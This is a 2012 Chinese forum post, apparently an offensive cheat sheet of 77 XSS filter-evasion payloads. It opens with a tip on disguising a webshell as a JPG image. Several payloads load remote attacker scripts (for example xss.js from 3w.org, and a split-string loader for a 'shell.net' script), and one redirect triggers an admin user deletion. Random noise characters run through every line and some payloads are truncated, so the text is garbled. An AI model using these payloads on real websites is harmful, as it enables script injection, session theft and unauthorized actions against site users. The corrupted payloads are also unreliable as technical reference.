跨站图片shell
5 t9 Z5 d& y9 _XSS跨站代码 <script>alert("")</script>
# h/ F) {4 A2 _2 l6 }: o3 M& [ Q7 K, X* z; f
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
4 n4 e7 W q: u# A+ z: r) _) s0 \+ d# B; Q( @0 @
w' a3 H/ n' Q$ z
& K4 ^& T8 B( R u7 G5 h& l- S# Y1)普通的XSS JavaScript注入
0 v) b) O2 R. v% F<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 j$ V8 B5 b* N0 K# J* {. g7 |$ U6 E& A, b( O
(2)IMG标签XSS使用JavaScript命令& e' O% `% `# Y. Z, S: X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" C0 h4 T4 a) ^9 z: T' G
) k, k4 P& t$ n* A/ G. j k(3)IMG标签无分号无引号% \* t9 C/ D+ O0 w
<IMG SRC=javascript:alert(‘XSS’)>) o! ~$ G6 N- x+ i8 r
3 Q" x4 n- ?/ y$ O+ C
(4)IMG标签大小写不敏感
1 U% f. r0 [3 M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ ], ?! j* a: ]% p, I8 h' h: Y; ]+ d8 v$ r' |; k/ D$ y$ n5 u% m* r
(5)HTML编码(必须有分号)
) z. S; c0 c: S1 {3 D! b( E<IMG SRC=javascript:alert(“XSS”)>. o3 L; |' s+ b: k& y) V' Y
. J* u% t" l! H/ {( O, e1 `(6)修正缺陷IMG标签2 r( V* h, P) e. l0 `
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 W2 K0 O& c L0 ^
( `; p- R3 L0 c5 n c/ A
(7)formCharCode标签(计算器)7 y2 E! X% r& M' W! S6 @) I
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, L2 l- E& a0 D% x- W# b* U' D; ]" k0 \8 o4 V$ |! z
(8)UTF-8的Unicode编码(计算器)9 g [3 z$ j' R' ~
<IMG SRC=jav..省略..S')>+ s/ U% x0 C( l, q
$ p" D5 u/ f- k, ~/ t" Z(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' d" E" J' j( P# H" X<IMG SRC=jav..省略..S')>
9 k E5 \3 T2 a7 a8 C* s7 ^+ O% y- ^( r9 J4 ^' J# I
(10)十六进制编码也是没有分号(计算器)1 K) P4 t6 [( \7 G- K
<IMG SRC=java..省略..XSS')>
) p$ |6 x+ \4 K0 ]2 u* F- N6 Y; B. [) H, }7 ~9 j% x
(11)嵌入式标签,将Javascript分开2 {3 E( k M3 @( v. A7 j: H- y' B
<IMG SRC=”jav ascript:alert(‘XSS’);”>* I) g% c7 P3 y& a
! a! Y* |+ N$ E; B' A/ l: {0 u; g(12)嵌入式编码标签,将Javascript分开% K2 M& a* }' N1 N
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* K6 h( D/ M% o# x2 c5 T s) w& k3 f- `! b& X
(13)嵌入式换行符
3 f( D: v$ H2 b5 M! D1 ?8 f, M<IMG SRC=”jav ascript:alert(‘XSS’);”>
% |2 g0 r+ A# U% s( C; ?
' S5 T: o/ a/ w! `" h. g k( g(14)嵌入式回车5 v6 ]6 V. l& H+ V Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>; r& m% i4 o, J) p) T* y- }/ T
& M% ~9 p3 S8 e! D' g) \9 k9 v
(15)嵌入式多行注入JavaScript,这是XSS极端的例子- u9 A% R- l7 w" `7 N& l8 k& B
<IMG SRC=”javascript:alert(‘XSS‘)”>
4 P8 p- s7 P. |: N, m8 {. w2 O: X! U
1 f6 m" F& a2 p% d8 G: H3 U1 k(16)解决限制字符(要求同页面)0 k9 b+ o3 m' r" \1 M4 i0 G
<script>z=’document.’</script>
& `6 ?+ M: \$ _, b2 i3 o<script>z=z+’write(“‘</script>
! W. o' ^# @7 `- h8 z V7 O<script>z=z+’<script’</script>0 C) V, W$ s( z6 Z1 J) d5 r* N) U2 M, d
<script>z=z+’ src=ht’</script>4 M! W+ e# Y# ]. i+ P
<script>z=z+’tp://ww’</script>" q0 H3 r5 @1 L: ?5 P) Q1 q
<script>z=z+’w.shell’</script>9 g3 X3 _+ d" f2 W6 W
<script>z=z+’.net/1.’</script>* y& b; b+ B: y
<script>z=z+’js></sc’</script>
/ m& w" y* A/ X; S! ~<script>z=z+’ript>”)’</script>" v$ P1 H% V& D; w, w
<script>eval_r(z)</script>! M8 {; h# R0 C% [0 A* l) K$ {
+ n4 U9 \6 f* x" r8 R" k, F(17)空字符7 N l4 k, L3 G6 t( E0 @3 @1 W
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% X! J& N2 B+ q/ H3 t6 m* t7 p8 O" M/ S
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, a/ P, u- L. }perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) c, [' J1 k: v4 q0 G; l3 M
6 Z4 E3 V( q' i
(19)Spaces和meta前的IMG标签
! d5 \' B2 S" {" X, \2 z3 e* n1 ?<IMG SRC=” javascript:alert(‘XSS’);”>
, r' ]8 a( A/ z$ z6 |3 Z4 Q$ m/ Y! x7 ^2 i9 h" q, G- X! o
(20)Non-alpha-non-digit XSS
/ f6 ]7 T1 u+ s9 h<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ ~) H. m* [1 {; m( M) {
& B. d5 U: w" |( j1 X(21)Non-alpha-non-digit XSS to 29 p/ N( P# ^# }0 J+ d
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! q' ^- R: s4 L. v. D/ l8 r& Q. ^# _& e; N
(22)Non-alpha-non-digit XSS to 3
# T1 D2 f- i- z2 v) t! h% K. ~<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT># l/ g; S/ T& k9 @
. ]6 w- W0 j7 H* w& a) Q4 K% J7 Q
(23)双开括号0 N7 \! b7 C1 u
<<SCRIPT>alert(“XSS”);//<</SCRIPT>. n: {$ ?0 Q0 U& M
7 T; f& S' z- ?' \( @$ t5 [. s
(24)无结束脚本标记(仅火狐等浏览器). O8 b: d: h6 D* I3 G; v" s
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
3 B; A: Y6 ~* `6 W. a. v
7 t5 `- \8 g- r% \ P2 s& u(25)无结束脚本标记22 H, A) L% C! i& t% S
<SCRIPT SRC=//3w.org/XSS/xss.js>
, e$ ^" V2 K6 k. o: J: o4 b0 {, H. L4 h6 H6 g# ~# ?/ i. {2 D
(26)半开的HTML/JavaScript XSS: t# X+ u% O) E3 G
<IMG SRC=”javascript:alert(‘XSS’)”
* } E1 A! [8 S
! P" ^- r% A- e* g0 b1 n9 @7 I(27)双开角括号
- G/ I2 N( l3 D0 E! v<iframe src=http://3w.org/XSS.html <; F" G7 M" n1 |. K( L
: Z. p5 J+ k: O! k' X: [" O+ ^. V
(28)无单引号 双引号 分号; l2 x1 ^2 h& q* X" \
<SCRIPT>a=/XSS/
' \6 j3 H" A5 E: [alert(a.source)</SCRIPT>
) S. p* \# I, k% k- F( |' n: h( K# d8 F) @- C Q
(29)换码过滤的JavaScript
+ b2 n- w# `1 h- B\”;alert(‘XSS’);//
; B1 }) ?8 a% j h# K, x8 E; [, e' k' x1 y9 B
(30)结束Title标签4 \/ h% f* b) e y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
) M- h. F* {% d# F7 V; ^
, B) N0 C' u" r' z* Y(31)Input Image# {6 w( i7 E- E* C
<INPUT SRC=”javascript:alert(‘XSS’);”>. u8 {2 D5 H3 ~( L& h$ u
3 a! Q, F4 O, T(32)BODY Image, ]# B6 p# E; P. d8 v9 _9 B
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
) C" d5 S0 [, W1 Q& H! g1 W
+ Y" g {: f" B, E$ y4 u5 }; A(33)BODY标签! }2 l# D4 M' P# C. V$ J
<BODY(‘XSS’)>* y2 T0 Y$ d k4 ~
3 {+ j; \. M; m+ G4 |6 C$ w+ n(34)IMG Dynsrc5 d! J3 y. J- x
<IMG DYNSRC=”javascript:alert(‘XSS’)”>- ~* m* ]% x+ ]- J& l
5 F6 I8 @2 C! B* e/ K9 r1 K$ s; l* p(35)IMG Lowsrc5 x3 @. w" l8 O# r1 j
<IMG LOWSRC=”javascript:alert(‘XSS’)”>1 i0 F+ g) v/ v; [# v% p
& _$ @4 _. m5 r1 K( v0 a6 V
(36)BGSOUND/ q m t n( Y$ g
<BGSOUND SRC=”javascript:alert(‘XSS’);”>/ P% g* T: H; ^/ k3 ^
- M P7 J8 r/ u; V' K! B(37)STYLE sheet
1 R0 A# H6 O( z, t2 T6 h' S<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>2 i$ }2 g4 R8 u! n/ l
( J6 ~1 |. X& i: m1 ]: f( ?(38)远程样式表
, |# } I% s/ x<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>$ O# B3 h4 i9 ~1 m/ n$ X* k
' ]& W$ s& T! K# m
(39)List-style-image(列表式)
0 w4 a& A4 P7 v0 d2 x5 ?8 l<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS6 |3 E8 O+ D9 {/ @+ n1 ?; x
% V q4 c- N7 P( J- L% l: |6 L
(40)IMG VBscript$ D9 S* ~, L$ k6 S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS8 o+ C; Q- O' V' b* g& S
( Y* v6 f. Q2 B% D- a- [1 D" {
(41)META链接url% v9 w6 ]+ d. E/ l; o* |8 v
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
3 H; ]4 G- \/ ~; B/ y+ n0 |5 S
: `5 p% u' N2 v4 J. p! R! F: }' M/ q0 A(42)Iframe0 R. Z& |- f4 {% X$ U5 F( {
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
& E* b4 l4 S, ](43)Frame
; n7 E9 z O& n<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
1 ^9 [& Z4 K6 T' ~% j0 S1 G J! y/ X
(44)Table
7 W5 n8 m5 t7 I+ z7 m<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& \8 `+ i5 E& f; C U
8 r" q8 @" h* n* D* q5 W H) [(45)TD
# Y1 J, ~9 \4 J+ k) |9 \4 G<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 X. v' ]8 g% ] o0 b. Z2 F( |& s: a
(46)DIV background-image
6 {' ], R) N- l+ m6 J* a<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' @3 w8 g3 y! Z8 A! E# ^9 m! T
* X' \2 I4 T/ p) C3 L(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)$ s. w6 w4 m# ]+ a. i1 r
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
( E5 z% ~, ^6 s8 l1 e1 M5 k A1 d
- V% o; b/ S, s- |" J(48)DIV expression
! S; U: |/ C) B6 j<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 O, W; W J, n- K1 l+ X' C/ H" i; P$ j1 I' ^1 I" ?
(49)STYLE属性分拆表达: r: }7 W3 `) D* R0 O
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 `6 t8 |" s/ e9 g* H& f9 C% K& N% U: {+ N
(50)匿名STYLE(组成:开角号和一个字母开头)
L: M2 ?; v+ u<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
4 M- d" R9 b) R
1 \4 Y/ a; f7 s: ?& ^7 A) z(51)STYLE background-image! |5 S) r7 U5 i4 q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
/ J+ } G4 d$ |. I! \1 Y' q4 q$ Z) J3 \' [
(52)IMG STYLE方式7 ~+ @: f% F- s2 Z! {% G$ s
exppression(alert(“XSS”))’>
3 w2 ]1 m- y* Z4 `
. m, y: i S+ k(53)STYLE background% q7 a# t# E% i: y/ P4 ^
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% Y6 x9 s" n7 b% z* _, W4 B' z
; k' t) p/ p$ C8 v6 ^(54)BASE
5 H* s& d- `4 M1 n. G4 F<BASE HREF=”javascript:alert(‘XSS’);//”>6 Y H3 a& \& A( }
6 W5 L" \# I+ E, ` I; E
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" z/ t. ^% a; b2 |9 V<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 i' S* x' l$ E# C
2 N( W+ k2 G( r+ X) B6 j3 l; L$ [(56)在flash中使用ActionScrpt可以混进你XSS的代码: l2 Y S( F& b7 V+ ]
a=”get”;
& ~, k) S" L+ R( `/ Z7 db=”URL(\”"; M& {7 q2 @; T+ |9 D4 Y/ V. T
c=”javascript:”;
4 h5 W$ N+ k5 Q% F+ od=”alert(‘XSS’);\”)”;
' g, f, r q6 C+ oeval_r(a+b+c+d);
7 A- g2 }! W% x8 `0 T6 G) S5 D9 [3 L6 u$ a i- m
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 e' ^' K$ L1 k% y9 Q<HTML xmlns:xss>
' ^5 ]% y8 ~: C3 t<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>$ ^1 M8 X. z/ t% k) d* T1 O; z' r
<xss:xss>XSS</xss:xss>
% K7 c" U- l& R9 ?</HTML>
) @- v l6 Z& p# c$ i# q% Y# s0 P% B# {4 |7 `: A3 y; D
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用: c: j( K5 C6 S% z
<SCRIPT SRC=””></SCRIPT>4 R D) U+ A9 W- G5 X
. f- j& O) _9 u5 l$ R(59)IMG嵌入式命令,可执行任意命令
* Q6 z" k M3 C3 u; f9 R0 E: r<IMG SRC=”http://www.XXX.com/a.php?a=b”>1 ^0 N( O: j, p7 k
! M8 t5 u$ H% k T, h' F(60)IMG嵌入式命令(a.jpg在同服务器)
) U/ G( D' E7 F' |! xRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( G+ k5 S( c2 j3 g# _2 p/ d) j$ D$ [+ E$ ?
(61)绕符号过滤
8 h0 e0 M1 A2 q<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># E2 }6 O- J! f8 \& C+ l: O; }# R
5 w$ F4 f( ]3 a% x" g1 D(62)
/ T8 D* n* V( q, o) f& l<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>. X7 {' E v2 D0 T$ |
7 ~ z" j6 Q7 L1 _$ T3 b" f0 v5 B
(63), \$ ]( p1 @- A
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>0 Y, L+ a* C1 s* u$ S$ Z6 X
3 f# Q) Z- o W4 d" K4 _5 H! f2 b(64)
, A2 {0 i& x' Q9 w# k<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>. o' e+ l- k+ n
0 r; {3 r0 |( E) A4 o0 U! S(65)
/ E6 K1 N1 \8 `2 e0 S8 L2 G<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
; Z/ j7 g' f% a; v* w6 k
0 D; x) a8 X! {- ]1 A# a& B+ g. Q8 D(66) H$ ?' w' P& Q0 E' h' _' p# s
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' P( h- }) I. j8 x+ W G1 y: R1 A7 F2 D
(67)
( J4 ?! Q& m/ s z2 Q' f! f) l+ t<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
# O R7 ~; r! y, e* q5 T2 j8 w0 J/ v6 s' v: I! D
(68)URL绕行& A0 Q R$ Q1 E D/ L
<A HREF=”http://127.0.0.1/”>XSS</A>
8 q* u3 Q' B: _- z" w
9 C% d- D( H: D+ h(69)URL编码# o* ^ M9 d6 {( ~
<A HREF=”http://3w.org”>XSS</A>/ D, T9 e' ?7 C# h
4 U& y2 G! N) M+ N4 l! j(70)IP十进制. B" d, I0 \+ r6 M: I
<A HREF=”http://3232235521″>XSS</A>* B _5 t: [7 O4 r
) a9 S( m1 ~0 @8 t0 t4 g(71)IP十六进制
2 m: M) T C. W4 H- N3 ?<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>1 Y) S3 t3 o, v, Y1 A5 K
! u. D3 N+ h& a4 ~2 t/ [4 i
(72)IP八进制
, A& g/ ^9 z+ {: M' j# Z! v6 Z<A HREF=”http://0300.0250.0000.0001″>XSS</A>* s5 k) R" |6 @; L" S/ @, }6 H& ]
) P9 R) Q: x+ ]+ |; ^. |1 x(73)混合编码
' m# \* b) f6 j9 [6 s$ n x<A HREF=”h
- l1 Z/ W: A6 O7 }& q btt p://6 6.000146.0×7.147/”">XSS</A>( c. o# Z4 b- A4 I3 P5 A# v) M+ J' [
; ^2 d& r4 I( n( K" k1 `$ p
(74)节省[http:]
' P7 h! e# K5 c$ I<A HREF=”//www.google.com/”>XSS</A>- y* d) M6 ~, T3 P6 e
: X# e1 o4 S L+ s- A(75)节省[www] _) `$ j# G3 U% _& P& W7 g7 z* `
<A HREF=”http://google.com/”>XSS</A>" ^( z/ W/ U. }( ]# G) X! j2 H
/ O' r2 `; H7 ?+ s u# A) K! ~
(76)绝对点绝对DNS w( v' d' U8 r0 l
<A HREF=”http://www.google.com./”>XSS</A>
% y0 K' z1 U, M, X0 f+ E/ F
# V/ d( N* R- [8 }" d(77)javascript链接5 l! }, Q# s6 n$ U# j
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
- Y& M. I5 a! v8 h! ^$ @9 ?% ?2 f |
发表于 2012-9-13 17:04:56
收藏
支持
反对